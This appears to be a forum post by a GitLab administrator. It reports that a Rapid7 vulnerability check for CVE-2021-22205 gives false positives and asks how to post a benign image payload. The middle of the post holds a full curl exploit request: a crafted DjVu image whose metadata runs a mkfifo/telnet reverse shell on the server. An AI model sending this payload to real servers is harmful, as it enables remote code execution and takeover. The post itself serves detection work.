I’m ecstatic that a cookie finger print and remote check was made available for Gitlab cve-2021-22205 we run a lot of gitlab instances and the check is so close but it looks like the implementation is off by just a little bit.
R7 has a great analysis for the vulnerability that absolutely helps in narrowing down the false positives! CVE-2021-22205 | AttackerKB
Getting right down to it. The check sends a POST to /rapid7/cve-2021-22205.jpg which does trigger a 422 response but it triggers it in patched systems too. It looks like the logic issue is that no image data is actually being posted and the gitlab router still responds with a 422 on a patched system.
<?xml version="1.0" encoding="UTF-8"?>
<!--
Checks if the instance is running gitlabs
if successful it will send a bogus image to the uri
check the response
if we get a 422
vulnerable
-->
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
<NetworkService type="HTTP|HTTPS">
<Product vendor="GitLab" name="GitLab"/>
</NetworkService>
<HTTPCheck>
<HTTPRequest method="POST">
<URI>/rapid7/cve-2021-22205.jpg</URI>
<HTTPResponse code="422"/>
</HTTPRequest>
</HTTPCheck>
</VulnerabilityCheck>
However if you POST image data to the Gitlab service it will provide the expected 404 if it has been patched. So something like the following gets the appropriate response.
curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1' -H $'Content-Type: multipart/form-data; boundary=------------------------3749bbf4d5269117' -H $'Connection: close' \
--data-binary $'--------------------------3749bbf4d5269117\x0d\x0aContent-Disposition: form-data; name=\"file\"; filename=\"cve-2021-22205.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0aAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0a\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\x7f*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\x0aFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0a\x09(Copyright \"\\\x0a\" . qx{TF=$(mktemp -u);mkfifo $TF && telnet 127.0.0.1 5555 0<$TF | sh 1>$TF} . \\\x0a\" b \") ) \x0a\x0d\x0a--------------------------3749bbf4d5269117--\x0d\x0a' \
$'http://127.0.0.1/de0cf91a2f2aafef'
I’m trying to determine if there is a best practice for setting a benign image payload in the check to post image data for an updated check? something like but not exactly
<VulnerabilityCheck id="gitlab-cve-2021-22205" scope="endpoint">
<NetworkService type="HTTP|HTTPS">
<Product vendor="GitLab" name="GitLab"/>
</NetworkService>
<HTTPCheck>
<HTTPRequest method="POST">
<URI>/rapid7_cve-2021-22205</URI>
<mimeContent type="multipart/form-data">
<value format="hex">{insert payload hex here}</value>
</mimeContent>
<HTTPResponse code="422"/>
</HTTPRequest>
</HTTPCheck>
</VulnerabilityCheck>